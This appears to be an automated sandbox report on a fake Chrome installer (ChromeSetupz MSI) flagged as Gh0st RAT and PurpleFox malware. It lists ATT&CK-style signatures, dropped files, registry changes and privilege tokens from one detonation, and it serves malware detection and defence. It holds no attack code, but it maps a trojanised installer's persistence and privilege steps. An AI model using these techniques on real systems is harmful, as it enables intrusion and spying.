Malware Analysis Report

2024-12-07 13:44

Sample ID 241118-lxswpaypgp
Target ChromeSetupz.5516.25.msi.vir
SHA256 08734e0c77e055be3c43066f2cbcfd84537a819434d1e1f6d41c984ff7a4d865
Tags: discovery execution persistence privilege_escalation gh0strat purplefox evasion rat rootkit spyware stealer trojan
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

08734e0c77e055be3c43066f2cbcfd84537a819434d1e1f6d41c984ff7a4d865

Threat Level: Known bad

The file ChromeSetupz.5516.25.msi.vir was found to be: Known bad.

Malicious Activity Summary

discovery execution persistence privilege_escalation gh0strat purplefox evasion rat rootkit spyware stealer trojan

Gh0strat

Gh0strat family

Gh0st RAT payload

Purplefox family

Detect PurpleFox Rootkit

PurpleFox

Command and Scripting Interpreter: PowerShell

Enumerates connected drives

Boot or Logon Autostart Execution: Active Setup

Event Triggered Execution: Component Object Model Hijacking

Drops file in System32 directory

Loads dropped DLL

Drops file in Windows directory

Executes dropped EXE

Drops file in Program Files directory

Checks installed software on the system

Checks system information in the registry

Reads user/profile data of web browsers

Checks whether UAC is enabled

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Event Triggered Execution: Installer Packages

Browser Information Discovery

Enumerates physical storage devices

Suspicious use of SendNotifyMessage

Checks processor information in registry

Checks SCSI registry key(s)

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Runs ping.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam

Uses Volume Shadow Copy service COM API

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

Modifies registry class

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-18 09:55

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-18 09:55

Reported

2024-11-18 09:58

Platform

win7-20241023-en

Max time kernel

121s

Max time network

124s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\ChromeSetupz.5516.25.msi

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File created C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File created C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File created C:\Program Files\DriveHumbleTechnician\2_yrjwPObnoqyg.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File opened for modification C:\Program Files\DriveHumbleTechnician\2_yrjwPObnoqyg.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File created C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File created C:\Program Files\DriveHumbleTechnician\XjPDFEditCore.dll C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe C:\Windows\system32\MsiExec.exe N/A
File created C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.vbs C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
File created C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe C:\Windows\system32\MsiExec.exe N/A
File created C:\Program Files\DriveHumbleTechnician\XSMdjOpzlHEtnonzAHdFfqjsKAHetr C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File created C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.xml C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File opened for modification C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.xml C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
File opened for modification C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\Installer\f76fbb0.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIFDA0.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76fbae.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\Installer\f76fbad.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76fbad.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76fbae.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 9066b515a039db01 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\PackageCode = "057E34CA8B228F74186C96793AFD7D82" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\Version = "524290" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\6785353EFDC7D474B987CFA4A9EDDFC7\ProductFeature C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FB24B910C1788D5469B1AA3A1A3667BB C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\6785353EFDC7D474B987CFA4A9EDDFC7 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\ProductName = "DriveHumbleTechnician" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FB24B910C1788D5469B1AA3A1A3667BB\6785353EFDC7D474B987CFA4A9EDDFC7 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\SourceList\PackageName = "ChromeSetupz.5516.25.msi" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\6785353EFDC7D474B987CFA4A9EDDFC7\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: CmdExeWriteProcessMemorySpam

Description Indicator Process Target
N/A N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A
N/A N/A C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
